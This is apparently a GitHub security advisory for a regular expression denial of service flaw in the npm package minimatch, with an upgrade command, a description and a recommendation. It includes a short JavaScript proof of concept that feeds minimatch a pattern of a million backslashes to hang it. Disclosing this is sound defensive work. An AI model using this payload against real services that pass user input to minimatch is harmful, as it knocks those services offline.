GHSA-hxm2-r34f-qmc5
Regular Expression Denial of Service in minimatch
Quick fix
GHSA-hxm2-r34f-qmc5 — minimatch: upgrade to the fixed version with the command below.
npm install minimatch@3.0.2Details
Affected versions of `minimatch` are vulnerable to regular expression denial of service attacks when user input is passed into the `pattern` argument of `minimatch(path, pattern)`.
## Proof of Concept ```js var minimatch = require(“minimatch”);
// utility function for generating long strings var genstr = function (len, chr) { var result = “”; for (i=0; i<=len; i++) { result = result + chr; } return result; }
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit. console.log(“starting minimatch”); minimatch(“foo”, exploit); console.log(“finishing minimatch”); ```
## Recommendation
Update to version 3.0.2 or later.
Are you affected?
Enter the version of the package you're using.